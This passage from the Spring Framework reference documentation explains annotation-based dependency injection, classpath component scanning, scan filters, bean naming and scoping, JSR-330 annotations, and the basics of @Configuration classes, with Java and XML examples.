movieFinder;\n\t\t}\n\n\t}\n----\n\nIf no name is specified explicitly, the default name is derived from the field name or\nsetter method. In case of a field, it takes the field name; in case of a setter method,\nit takes the bean property name. 
So the following example is going to have the bean with\nname \"movieFinder\" injected into its setter method:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class SimpleMovieLister {\n\n\t\tprivate MovieFinder movieFinder;\n\n\t\t**@Resource**\n\t\tpublic void setMovieFinder(MovieFinder movieFinder) {\n\t\t\tthis.movieFinder = movieFinder;\n\t\t}\n\n\t}\n----\n\n[NOTE]\n====\nThe name provided with the annotation is resolved as a bean name by the\n`ApplicationContext` of which the `CommonAnnotationBeanPostProcessor` is aware. The\nnames can be resolved through JNDI if you configure Spring's\n{api-spring-framework}\/jndi\/support\/SimpleJndiBeanFactory.html[`SimpleJndiBeanFactory`]\nexplicitly. However, it is recommended that you rely on the default behavior and simply\nuse Spring's JNDI lookup capabilities to preserve the level of indirection.\n====\n\nIn the exclusive case of `@Resource` usage with no explicit name specified, and similar\nto `@Autowired`, `@Resource` finds a primary type match instead of a specific named bean\nand resolves well-known resolvable dependencies: the `BeanFactory`,\n`ApplicationContext`, `ResourceLoader`, `ApplicationEventPublisher`, and `MessageSource`\ninterfaces.\n\nThus in the following example, the `customerPreferenceDao` field first looks for a bean\nnamed customerPreferenceDao, then falls back to a primary type match for the type\n`CustomerPreferenceDao`. The \"context\" field is injected based on the known resolvable\ndependency type `ApplicationContext`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class MovieRecommender {\n\n\t\t@Resource\n\t\tprivate CustomerPreferenceDao customerPreferenceDao;\n\n\t\t@Resource\n\t\tprivate ApplicationContext context;\n\n\t\tpublic MovieRecommender() {\n\t\t}\n\n\t\t\/\/ ...\n\n\t}\n----\n\n\n\n[[beans-postconstruct-and-predestroy-annotations]]\n=== @PostConstruct and @PreDestroy\n\nThe `CommonAnnotationBeanPostProcessor` not only recognizes the `@Resource` annotation\nbut also the JSR-250 __lifecycle__ annotations. Introduced in Spring 2.5, the support\nfor these annotations offers yet another alternative to those described in\n<<beans-factory-lifecycle-initializingbean,initialization callbacks>> and\n<<beans-factory-lifecycle-disposablebean,destruction callbacks>>. Provided that the\n`CommonAnnotationBeanPostProcessor` is registered within the Spring\n`ApplicationContext`, a method carrying one of these annotations is invoked at the same\npoint in the lifecycle as the corresponding Spring lifecycle interface method or\nexplicitly declared callback method. In the example below, the cache will be\npre-populated upon initialization and cleared upon destruction.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpublic class CachingMovieLister {\n\n\t\t@PostConstruct\n\t\tpublic void populateMovieCache() {\n\t\t\t\/\/ populates the movie cache upon initialization...\n\t\t}\n\n\t\t@PreDestroy\n\t\tpublic void clearMovieCache() {\n\t\t\t\/\/ clears the movie cache upon destruction...\n\t\t}\n\n\t}\n----\n\n[NOTE]\n====\nFor details about the effects of combining various lifecycle mechanisms, see\n<<beans-factory-lifecycle-combined-effects>>.\n====\n\n\n\n\n[[beans-classpath-scanning]]\n== Classpath scanning and managed components\nMost examples in this chapter use XML to specify the configuration metadata that produces\neach `BeanDefinition` within the Spring container. 
The previous section\n(<<beans-annotation-config>>) demonstrates how to provide a lot of the configuration\nmetadata through source-level annotations. Even in those examples, however, the \"base\"\nbean definitions are explicitly defined in the XML file, while the annotations only drive\nthe dependency injection. This section describes an option for implicitly detecting the\n__candidate components__ by scanning the classpath. Candidate components are classes that\nmatch against a filter criteria and have a corresponding bean definition registered with\nthe container. This removes the need to use XML to perform bean registration; instead you\ncan use annotations (for example `@Component`), AspectJ type expressions, or your own\ncustom filter criteria to select which classes will have bean definitions registered with\nthe container.\n\n[NOTE]\n====\nStarting with Spring 3.0, many features provided by the Spring JavaConfig project are\npart of the core Spring Framework. This allows you to define beans using Java rather\nthan using the traditional XML files. Take a look at the `@Configuration`, `@Bean`,\n`@Import`, and `@DependsOn` annotations for examples of how to use these new features.\n====\n\n\n\n[[beans-stereotype-annotations]]\n=== @Component and further stereotype annotations\n\nThe `@Repository` annotation is a marker for any class that fulfills the role or\n__stereotype__ of a repository (also known as Data Access Object or DAO). Among the uses\nof this marker is the automatic translation of exceptions as described in\n<<orm-exception-translation>>.\n\nSpring provides further stereotype annotations: `@Component`, `@Service`, and\n`@Controller`. `@Component` is a generic stereotype for any Spring-managed component.\n`@Repository`, `@Service`, and `@Controller` are specializations of `@Component` for\nmore specific use cases, for example, in the persistence, service, and presentation\nlayers, respectively. Therefore, you can annotate your component classes with\n`@Component`, but by annotating them with `@Repository`, `@Service`, or `@Controller`\ninstead, your classes are more properly suited for processing by tools or associating\nwith aspects. For example, these stereotype annotations make ideal targets for\npointcuts. It is also possible that `@Repository`, `@Service`, and `@Controller` may\ncarry additional semantics in future releases of the Spring Framework. Thus, if you are\nchoosing between using `@Component` or `@Service` for your service layer, `@Service` is\nclearly the better choice. Similarly, as stated above, `@Repository` is already\nsupported as a marker for automatic exception translation in your persistence layer.\n\n\n\n[[beans-meta-annotations]]\n=== Meta-annotations\n\nMany of the annotations provided by Spring can be used as __meta-annotations__ in your\nown code. A meta-annotation is simply an annotation that can be applied to another\nannotation. For example, the `@Service` annotation mentioned above is meta-annotated with\n`@Component`:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Target(ElementType.TYPE)\n\t@Retention(RetentionPolicy.RUNTIME)\n\t@Documented\n\t**@Component** \/\/ Spring will see this and treat @Service in the same way as @Component\n\tpublic @interface Service {\n\n\t\t\/\/ ....\n\t}\n----\n\nMeta-annotations can also be combined to create __composed annotations__. 
For example, the `@RestController` annotation from Spring MVC is __composed__ of
`@Controller` and `@ResponseBody`.

In addition, composed annotations may optionally redeclare attributes from
meta-annotations to allow user customization. This can be particularly useful when you
want to expose only a subset of the meta-annotation's attributes. For example, Spring's
`@SessionScope` annotation hardcodes the scope name to `session` but still allows
customization of the `proxyMode`.

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	@Target({ElementType.TYPE, ElementType.METHOD})
	@Retention(RetentionPolicy.RUNTIME)
	@Documented
	@Scope(WebApplicationContext.SCOPE_SESSION)
	public @interface SessionScope {

		/**
		 * Alias for {@link Scope#proxyMode}.
		 * <p>Defaults to {@link ScopedProxyMode#TARGET_CLASS}.
		 */
		@AliasFor(annotation = Scope.class)
		ScopedProxyMode proxyMode() default ScopedProxyMode.TARGET_CLASS;

	}
----

`@SessionScope` can then be used without declaring the `proxyMode` as follows:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	@Service
	**@SessionScope**
	public class SessionScopedService {
		// ...
	}
----

Or with an overridden value for the `proxyMode` as follows:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	@Service
	**@SessionScope(proxyMode = ScopedProxyMode.INTERFACES)**
	public class SessionScopedUserService implements UserService {
		// ...
	}
----

For further details, consult the <<annotation-programming-model,Spring Annotation Programming Model>>.


[[beans-scanning-autodetection]]
=== Automatically detecting classes and registering bean definitions

Spring can automatically detect stereotyped classes and register corresponding
``BeanDefinition``s with the `ApplicationContext`. For example, the following two classes
are eligible for such autodetection:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	@Service
	public class SimpleMovieLister {

		private MovieFinder movieFinder;

		@Autowired
		public SimpleMovieLister(MovieFinder movieFinder) {
			this.movieFinder = movieFinder;
		}

	}
----

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	@Repository
	public class JpaMovieFinder implements MovieFinder {
		// implementation elided for clarity
	}
----

To autodetect these classes and register the corresponding beans, you need to add
`@ComponentScan` to your `@Configuration` class, where the `basePackages` attribute
is a common parent package for the two classes. (Alternatively, you can specify a
comma/semicolon/space-separated list that includes the parent package of each class.)

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	@Configuration
	@ComponentScan(basePackages = "org.example")
	public class AppConfig {
		...
	}
----

[NOTE]
====
For concision, the example above could have used the `value` attribute of the
annotation, i.e.
`@ComponentScan(\"org.example\")`\n====\n\nThe following is an alternative using XML\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n\t<beans xmlns=\"http:\/\/www.springframework.org\/schema\/beans\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txmlns:context=\"http:\/\/www.springframework.org\/schema\/context\"\n\t\txsi:schemaLocation=\"http:\/\/www.springframework.org\/schema\/beans\n\t\t\thttp:\/\/www.springframework.org\/schema\/beans\/spring-beans.xsd\n\t\t\thttp:\/\/www.springframework.org\/schema\/context\n\t\t\thttp:\/\/www.springframework.org\/schema\/context\/spring-context.xsd\">\n\n\t\t<context:component-scan base-package=\"org.example\"\/>\n\n\t<\/beans>\n----\n\n[TIP]\n====\nThe use of `<context:component-scan>` implicitly enables the functionality of\n`<context:annotation-config>`. There is usually no need to include the\n`<context:annotation-config>` element when using `<context:component-scan>`.\n====\n\n[NOTE]\n====\nThe scanning of classpath packages requires the presence of corresponding directory\nentries in the classpath. When you build JARs with Ant, make sure that you do __not__\nactivate the files-only switch of the JAR task. Also, classpath directories may not\nget exposed based on security policies in some environments, e.g. standalone apps on\nJDK 1.7.0_45 and higher (which requires 'Trusted-Library' setup in your manifests; see\nhttp:\/\/stackoverflow.com\/questions\/19394570\/java-jre-7u45-breaks-classloader-getresources).\n====\n\nFurthermore, the `AutowiredAnnotationBeanPostProcessor` and\n`CommonAnnotationBeanPostProcessor` are both included implicitly when you use the\ncomponent-scan element. That means that the two components are autodetected __and__\nwired together - all without any bean configuration metadata provided in XML.\n\n[NOTE]\n====\nYou can disable the registration of `AutowiredAnnotationBeanPostProcessor` and\n`CommonAnnotationBeanPostProcessor` by including the __annotation-config__ attribute\nwith a value of false.\n====\n\n\n\n[[beans-scanning-filters]]\n=== Using filters to customize scanning\n\nBy default, classes annotated with `@Component`, `@Repository`, `@Service`,\n`@Controller`, or a custom annotation that itself is annotated with `@Component` are the\nonly detected candidate components. However, you can modify and extend this behavior\nsimply by applying custom filters. Add them as __includeFilters__ or __excludeFilters__\nparameters of the `@ComponentScan` annotation (or as __include-filter__ or __exclude-filter__\nsub-elements of the `component-scan` element). Each filter element requires the `type`\nand `expression` attributes. 
The following table describes the filtering options.

[[beans-scanning-filters-tbl]]
.Filter Types
|===
| Filter Type| Example Expression| Description

| annotation (default)
| `org.example.SomeAnnotation`
| An annotation to be present at the type level in target components.

| assignable
| `org.example.SomeClass`
| A class (or interface) that the target components are assignable to (extend/implement).

| aspectj
| `org.example..*Service+`
| An AspectJ type expression to be matched by the target components.

| regex
| `org\.example\.Default.*`
| A regular expression to be matched against the target components' class names.

| custom
| `org.example.MyTypeFilter`
| A custom implementation of the `org.springframework.core.type.TypeFilter` interface.
|===

The following example shows the configuration ignoring all `@Repository` annotations
and using "stub" repositories instead.


[source,java,indent=0]
[subs="verbatim,quotes"]
----
	@Configuration
	@ComponentScan(basePackages = "org.example",
			includeFilters = @Filter(type = FilterType.REGEX, pattern = ".*Stub.*Repository"),
			excludeFilters = @Filter(Repository.class))
	public class AppConfig {
		...
	}
----

and the equivalent using XML:

[source,xml,indent=0]
[subs="verbatim,quotes"]
----
	<beans>
		<context:component-scan base-package="org.example">
			<context:include-filter type="regex"
					expression=".*Stub.*Repository"/>
			<context:exclude-filter type="annotation"
					expression="org.springframework.stereotype.Repository"/>
		</context:component-scan>
	</beans>
----

[NOTE]
====
You can also disable the default filters by setting `useDefaultFilters=false` on the annotation or
providing `use-default-filters="false"` as an attribute of the `<component-scan/>` element. This
will in effect disable automatic detection of classes annotated with `@Component`, `@Repository`,
`@Service`, `@Controller`, or `@Configuration`.
====



[[beans-factorybeans-annotations]]
=== Defining bean metadata within components

Spring components can also contribute bean definition metadata to the container. You do
this with the same `@Bean` annotation used to define bean metadata within `@Configuration`
annotated classes. Here is a simple example:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	@Component
	public class FactoryMethodComponent {

		@Bean
		@Qualifier("public")
		public TestBean publicInstance() {
			return new TestBean("publicInstance");
		}

		public void doWork() {
			// Component method implementation omitted
		}

	}
----

This class is a Spring component that has application-specific code contained in its
`doWork()` method. However, it also contributes a bean definition that has a factory
method referring to the method `publicInstance()`. The `@Bean` annotation identifies the
factory method and other bean definition properties, such as a qualifier value through
the `@Qualifier` annotation. Other method-level annotations that can be specified are
`@Scope`, `@Lazy`, and custom qualifier annotations.

[TIP]
====
In addition to its role for component initialization, the `@Lazy` annotation may also be
placed on injection points marked with `@Autowired` or `@Inject`.
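
For example (a minimal sketch, reusing the `MovieRecommender` example from above):

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	public class MovieRecommender {

		@Lazy
		@Autowired
		private MovieCatalog movieCatalog; // resolved on first access, not at startup

		// ...

	}
----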
In this context, it\nleads to the injection of a lazy-resolution proxy.\n====\n\nAutowired fields and methods are supported as previously discussed, with additional\nsupport for autowiring of `@Bean` methods:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Component\n\tpublic class FactoryMethodComponent {\n\n\t\tprivate static int i;\n\n\t\t@Bean\n\t\t@Qualifier(\"public\")\n\t\tpublic TestBean publicInstance() {\n\t\t\treturn new TestBean(\"publicInstance\");\n\t\t}\n\n\t\t\/\/ use of a custom qualifier and autowiring of method parameters\n\t\t@Bean\n\t\tprotected TestBean protectedInstance(\n\t\t\t\t@Qualifier(\"public\") TestBean spouse,\n\t\t\t\t@Value(\"#{privateInstance.age}\") String country) {\n\t\t\tTestBean tb = new TestBean(\"protectedInstance\", 1);\n\t\t\ttb.setSpouse(spouse);\n\t\t\ttb.setCountry(country);\n\t\t\treturn tb;\n\t\t}\n\n\t\t@Bean\n\t\tprivate TestBean privateInstance() {\n\t\t\treturn new TestBean(\"privateInstance\", i++);\n\t\t}\n\n\t\t@Bean\n\t\t@RequestScope\n\t\tpublic TestBean requestScopedInstance() {\n\t\t\treturn new TestBean(\"requestScopedInstance\", 3);\n\t\t}\n\n\t}\n----\n\nThe example autowires the `String` method parameter `country` to the value of the `Age`\nproperty on another bean named `privateInstance`. A Spring Expression Language element\ndefines the value of the property through the notation `#{ <expression> }`. For `@Value`\nannotations, an expression resolver is preconfigured to look for bean names when\nresolving expression text.\n\nAs of Spring Framework 4.3, you may also declare a factory method parameter of type\n`InjectionPoint` (or its more specific subclass `DependencyDescriptor`) in order to\naccess the requesting injection point that triggers the creation of the current bean.\nNote that this will only apply to the actual creation of bean instances, not to the\ninjection of existing instances. As a consequence, this feature makes most sense for\nbeans of prototype scope. For other scopes, the factory method will only ever see the\ninjection point which triggered the creation of a new bean instance in the given scope:\nfor example, the dependency that triggered the creation of a lazy singleton bean.\nUse the provided injection point metadata with semantic care in such scenarios.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Component\n\tpublic class FactoryMethodComponent {\n\n\t\t@Bean @Scope(\"prototype\")\n\t\tpublic TestBean prototypeInstance(InjectionPoint injectionPoint) {\n\t\t\treturn new TestBean(\"prototypeInstance for \" + injectionPoint.getMember());\n\t\t}\n\t}\n----\n\nThe `@Bean` methods in a regular Spring component are processed differently than their\ncounterparts inside a Spring `@Configuration` class. 
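
For example, consider the following contrast, sketched here with hypothetical
`ClientDao` and `ClientService` types:

[source,java,indent=0]
[subs="verbatim,quotes"]
----
	@Configuration
	public class ClientConfig {

		@Bean
		public ClientDao clientDao() {
			return new ClientDaoImpl();
		}

		// In full @Configuration mode, this call to clientDao() is intercepted
		// by the container and returns the one container-managed ClientDao bean.
		// If ClientConfig were annotated with @Component instead, the call would
		// execute with plain Java semantics, returning a fresh ClientDaoImpl
		// instance that is unknown to the container.
		@Bean
		public ClientService clientService() {
			return new ClientService(clientDao());
		}

	}
----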
The difference is that `@Component`\nclasses are not enhanced with CGLIB to intercept the invocation of methods and fields.\nCGLIB proxying is the means by which invoking methods or fields within `@Bean` methods\nin `@Configuration` classes creates bean metadata references to collaborating objects;\nsuch methods are __not__ invoked with normal Java semantics but rather go through the\ncontainer in order to provide the usual lifecycle management and proxying of Spring\nbeans even when referring to other beans via programmatic calls to `@Bean` methods.\nIn contrast, invoking a method or field in an `@Bean` method within a plain `@Component`\nclass __has__ standard Java semantics, with no special CGLIB processing or other\nconstraints applying.\n\n[NOTE]\n====\nYou may declare `@Bean` methods as `static`, allowing for them to be called without\ncreating their containing configuration class as an instance. This makes particular\nsense when defining post-processor beans, e.g. of type `BeanFactoryPostProcessor` or\n`BeanPostProcessor`, since such beans will get initialized early in the container\nlifecycle and should avoid triggering other parts of the configuration at that point.\n\nNote that calls to static `@Bean` methods will never get intercepted by the container,\nnot even within `@Configuration` classes (see above). This is due to technical\nlimitations: CGLIB subclassing can only override non-static methods. As a consequence,\na direct call to another `@Bean` method will have standard Java semantics, resulting\nin an independent instance being returned straight from the factory method itself.\n\nThe Java language visibility of `@Bean` methods does not have an immediate impact on\nthe resulting bean definition in Spring's container. You may freely declare your\nfactory methods as you see fit in non-`@Configuration` classes and also for static\nmethods anywhere. However, regular `@Bean` methods in `@Configuration` classes need\nto be overridable, i.e. they must not be declared as `private` or `final`.\n\n`@Bean` methods will also be discovered on base classes of a given component or\nconfiguration class, as well as on Java 8 default methods declared in interfaces\nimplemented by the component or configuration class. This allows for a lot of\nflexibility in composing complex configuration arrangements, with even multiple\ninheritance being possible through Java 8 default methods as of Spring 4.2.\n\nFinally, note that a single class may hold multiple `@Bean` methods for the same\nbean, as an arrangement of multiple factory methods to use depending on available\ndependencies at runtime. This is the same algorithm as for choosing the \"greediest\"\nconstructor or factory method in other configuration scenarios: The variant with\nthe largest number of satisfiable dependencies will be picked at construction time,\nanalogous to how the container selects between multiple `@Autowired` constructors.\n====\n\n\n\n[[beans-scanning-name-generator]]\n=== Naming autodetected components\n\nWhen a component is autodetected as part of the scanning process, its bean name is\ngenerated by the `BeanNameGenerator` strategy known to that scanner. 
By default, any\nSpring stereotype annotation (`@Component`, `@Repository`, `@Service`, and\n`@Controller`) that contains a _name_ `value` will thereby provide that name to the\ncorresponding bean definition.\n\nIf such an annotation contains no _name_ `value` or for any other detected component (such\nas those discovered by custom filters), the default bean name generator returns the\nuncapitalized non-qualified class name. For example, if the following two components\nwere detected, the names would be `myMovieLister` and `movieFinderImpl`:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Service(\"myMovieLister\")\n\tpublic class SimpleMovieLister {\n\t\t\/\/ ...\n\t}\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Repository\n\tpublic class MovieFinderImpl implements MovieFinder {\n\t\t\/\/ ...\n\t}\n----\n\n[NOTE]\n====\nIf you do not want to rely on the default bean-naming strategy, you can provide a custom\nbean-naming strategy. First, implement the\n{api-spring-framework}\/beans\/factory\/support\/BeanNameGenerator.html[`BeanNameGenerator`]\ninterface, and be sure to include a default no-arg constructor. Then, provide the\nfully-qualified class name when configuring the scanner:\n====\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n @ComponentScan(basePackages = \"org.example\", nameGenerator = MyNameGenerator.class)\n public class AppConfig {\n \t...\n }\n----\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans>\n\t\t<context:component-scan base-package=\"org.example\"\n\t\t\tname-generator=\"org.example.MyNameGenerator\" \/>\n\t<\/beans>\n----\n\nAs a general rule, consider specifying the name with the annotation whenever other\ncomponents may be making explicit references to it. On the other hand, the\nauto-generated names are adequate whenever the container is responsible for wiring.\n\n\n\n[[beans-scanning-scope-resolver]]\n=== Providing a scope for autodetected components\n\nAs with Spring-managed components in general, the default and most common scope for\nautodetected components is `singleton`. However, sometimes you need a different scope\nwhich can be specified via the `@Scope` annotation. Simply provide the name of the scope\nwithin the annotation:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Scope(\"prototype\")\n\t@Repository\n\tpublic class MovieFinderImpl implements MovieFinder {\n\t\t\/\/ ...\n\t}\n----\n\nFor details on web-specific scopes, see <<beans-factory-scopes-other>>.\n\n\n[NOTE]\n====\nTo provide a custom strategy for scope resolution rather than relying on the\nannotation-based approach, implement the\n{api-spring-framework}\/context\/annotation\/ScopeMetadataResolver.html[`ScopeMetadataResolver`]\ninterface, and be sure to include a default no-arg constructor. Then, provide the\nfully-qualified class name when configuring the scanner:\n====\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\t@ComponentScan(basePackages = \"org.example\", scopeResolver = MyScopeResolver.class)\n\tpublic class AppConfig {\n \t...\n }\n----\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans>\n\t\t<context:component-scan base-package=\"org.example\"\n\t\t\t\tscope-resolver=\"org.example.MyScopeResolver\" \/>\n\t<\/beans>\n----\n\nWhen using certain non-singleton scopes, it may be necessary to generate proxies for the\nscoped objects. 
The reasoning is described in <<beans-factory-scopes-other-injection>>.\nFor this purpose, a __scoped-proxy__ attribute is available on the component-scan\nelement. The three possible values are: no, interfaces, and targetClass. For example,\nthe following configuration will result in standard JDK dynamic proxies:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\t@ComponentScan(basePackages = \"org.example\", scopedProxy = ScopedProxyMode.INTERFACES)\n\tpublic class AppConfig {\n \t...\n }\n----\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<beans>\n\t\t<context:component-scan base-package=\"org.example\"\n\t\t\tscoped-proxy=\"interfaces\" \/>\n\t<\/beans>\n----\n\n\n\n[[beans-scanning-qualifiers]]\n=== Providing qualifier metadata with annotations\n\nThe `@Qualifier` annotation is discussed in <<beans-autowired-annotation-qualifiers>>.\nThe examples in that section demonstrate the use of the `@Qualifier` annotation and\ncustom qualifier annotations to provide fine-grained control when you resolve autowire\ncandidates. Because those examples were based on XML bean definitions, the qualifier\nmetadata was provided on the candidate bean definitions using the `qualifier` or `meta`\nsub-elements of the `bean` element in the XML. When relying upon classpath scanning for\nautodetection of components, you provide the qualifier metadata with type-level\nannotations on the candidate class. The following three examples demonstrate this\ntechnique:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Component\n\t**@Qualifier(\"Action\")**\n\tpublic class ActionMovieCatalog implements MovieCatalog {\n\t\t\/\/ ...\n\t}\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Component\n\t**@Genre(\"Action\")**\n\tpublic class ActionMovieCatalog implements MovieCatalog {\n\t\t\/\/ ...\n\t}\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Component\n\t**@Offline**\n\tpublic class CachingMovieCatalog implements MovieCatalog {\n\t\t\/\/ ...\n\t}\n----\n\n[NOTE]\n====\nAs with most annotation-based alternatives, keep in mind that the annotation metadata is\nbound to the class definition itself, while the use of XML allows for multiple beans\n__of the same type__ to provide variations in their qualifier metadata, because that\nmetadata is provided per-instance rather than per-class.\n====\n\n\n\n\n[[beans-standard-annotations]]\n== Using JSR 330 Standard Annotations\nStarting with Spring 3.0, Spring offers support for JSR-330 standard annotations\n(Dependency Injection). Those annotations are scanned in the same way as the Spring\nannotations. 
You just need to have the relevant jars in your classpath.\n\n[NOTE]\n====\nIf you are using Maven, the `javax.inject` artifact is available in the standard Maven\nrepository (\nhttp:\/\/repo1.maven.org\/maven2\/javax\/inject\/javax.inject\/1\/[http:\/\/repo1.maven.org\/maven2\/javax\/inject\/javax.inject\/1\/]).\nYou can add the following dependency to your file pom.xml:\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<dependency>\n\t\t<groupId>javax.inject<\/groupId>\n\t\t<artifactId>javax.inject<\/artifactId>\n\t\t<version>1<\/version>\n\t<\/dependency>\n----\n====\n\n\n\n[[beans-inject-named]]\n=== Dependency Injection with @Inject and @Named\n\nInstead of `@Autowired`, `@javax.inject.Inject` may be used as follows:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\timport javax.inject.Inject;\n\n\tpublic class SimpleMovieLister {\n\n\t\tprivate MovieFinder movieFinder;\n\n\t\t@Inject\n\t\tpublic void setMovieFinder(MovieFinder movieFinder) {\n\t\t\tthis.movieFinder = movieFinder;\n\t\t}\n\n\t\tpublic void listMovies() {\n\t\t\tthis.movieFinder.findMovies(...);\n\t\t\t...\n\t\t}\n\t}\n----\n\nAs with `@Autowired`, it is possible to use `@Inject` at the field level, method level\nand constructor-argument level. Furthermore, you may declare your injection point as a\n`Provider`, allowing for on-demand access to beans of shorter scopes or lazy access to\nother beans through a `Provider.get()` call. As a variant of the example above:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\timport javax.inject.Inject;\n\timport javax.inject.Provider;\n\n\tpublic class SimpleMovieLister {\n\n\t\tprivate Provider<MovieFinder> movieFinder;\n\n\t\t@Inject\n\t\tpublic void setMovieFinder(Provider<MovieFinder> movieFinder) {\n\t\t\tthis.movieFinder = movieFinder;\n\t\t}\n\n\t\tpublic void listMovies() {\n\t\t\tthis.movieFinder.get().findMovies(...);\n\t\t\t...\n\t\t}\n\t}\n----\n\nIf you would like to use a qualified name for the dependency that should be injected,\nyou should use the `@Named` annotation as follows:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\timport javax.inject.Inject;\n\timport javax.inject.Named;\n\n\tpublic class SimpleMovieLister {\n\n\t\tprivate MovieFinder movieFinder;\n\n\t\t@Inject\n\t\tpublic void setMovieFinder(@Named(\"main\") MovieFinder movieFinder) {\n\t\t\tthis.movieFinder = movieFinder;\n\t\t}\n\n\t\t\/\/ ...\n\t}\n----\n\n\n\n[[beans-named]]\n=== @Named and @ManagedBean: standard equivalents to the @Component annotation\n\nInstead of `@Component`, `@javax.inject.Named` or `javax.annotation.ManagedBean` may be\nused as follows:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\timport javax.inject.Inject;\n\timport javax.inject.Named;\n\n\t@Named(\"movieListener\") \/\/ @ManagedBean(\"movieListener\") could be used as well\n\tpublic class SimpleMovieLister {\n\n\t\tprivate MovieFinder movieFinder;\n\n\t\t@Inject\n\t\tpublic void setMovieFinder(MovieFinder movieFinder) {\n\t\t\tthis.movieFinder = movieFinder;\n\t\t}\n\n\t\t\/\/ ...\n\t}\n----\n\nIt is very common to use `@Component` without specifying a name for the component.\n`@Named` can be used in a similar fashion:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\timport javax.inject.Inject;\n\timport javax.inject.Named;\n\n\t@Named\n\tpublic class SimpleMovieLister {\n\n\t\tprivate MovieFinder movieFinder;\n\n\t\t@Inject\n\t\tpublic void setMovieFinder(MovieFinder movieFinder) {\n\t\t\tthis.movieFinder = 
movieFinder;\n\t\t}\n\n\t\t\/\/ ...\n\t}\n----\n\nWhen using `@Named` or `@ManagedBean`, it is possible to use component scanning in the\nexact same way as when using Spring annotations:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\t@ComponentScan(basePackages = \"org.example\")\n\tpublic class AppConfig {\n \t...\n\t}\n----\n\n[NOTE]\n====\nIn contrast to `@Component`, the JSR-330 `@Named` and the JSR-250 `ManagedBean`\nannotations are not composable. Please use Spring's stereotype model for building custom\ncomponent annotations.\n====\n\n\n\n[[beans-standard-annotations-limitations]]\n=== Limitations of JSR-330 standard annotations\n\nWhen working with standard annotations, it is important to know that some significant\nfeatures are not available as shown in the table below:\n\n[[annotations-comparison]]\n.Spring component model elements vs. JSR-330 variants\n|===\n| Spring| javax.inject.*| javax.inject restrictions \/ comments\n\n| @Autowired\n| @Inject\n| `@Inject` has no 'required' attribute; can be used with Java 8's `Optional` instead.\n\n| @Component\n| @Named \/ @ManagedBean\n| JSR-330 does not provide a composable model, just a way to identify named components.\n\n| @Scope(\"singleton\")\n| @Singleton\n| The JSR-330 default scope is like Spring's `prototype`. However, in order to keep it\n consistent with Spring's general defaults, a JSR-330 bean declared in the Spring\n container is a `singleton` by default. In order to use a scope other than `singleton`,\n you should use Spring's `@Scope` annotation. `javax.inject` also provides a\n http:\/\/download.oracle.com\/javaee\/6\/api\/javax\/inject\/Scope.html[@Scope] annotation.\n Nevertheless, this one is only intended to be used for creating your own annotations.\n\n| @Qualifier\n| @Qualifier \/ @Named\n| `javax.inject.Qualifier` is just a meta-annotation for building custom qualifiers.\n Concrete String qualifiers (like Spring's `@Qualifier` with a value) can be associated\n through `javax.inject.Named`.\n\n| @Value\n| -\n| no equivalent\n\n| @Required\n| -\n| no equivalent\n\n| @Lazy\n| -\n| no equivalent\n\n| ObjectFactory\n| Provider\n| `javax.inject.Provider` is a direct alternative to Spring's `ObjectFactory`,\n just with a shorter `get()` method name. It can also be used in combination with\n Spring's `@Autowired` or with non-annotated constructors and setter methods.\n|===\n\n\n\n\n[[beans-java]]\n== Java-based container configuration\n\n\n\n[[beans-java-basic-concepts]]\n=== Basic concepts: @Bean and @Configuration\n\nThe central artifacts in Spring's new Java-configuration support are\n`@Configuration`-annotated classes and `@Bean`-annotated methods.\n\nThe `@Bean` annotation is used to indicate that a method instantiates, configures and\ninitializes a new object to be managed by the Spring IoC container. For those familiar\nwith Spring's `<beans\/>` XML configuration the `@Bean` annotation plays the same role as\nthe `<bean\/>` element. You can use `@Bean` annotated methods with any Spring\n`@Component`, however, they are most often used with `@Configuration` beans.\n\nAnnotating a class with `@Configuration` indicates that its primary purpose is as a\nsource of bean definitions. 
Furthermore, `@Configuration` classes allow inter-bean
dependencies to be defined by simply calling other `@Bean` methods in the same class.
The simplest possible `@Configuration` class would read as follows:

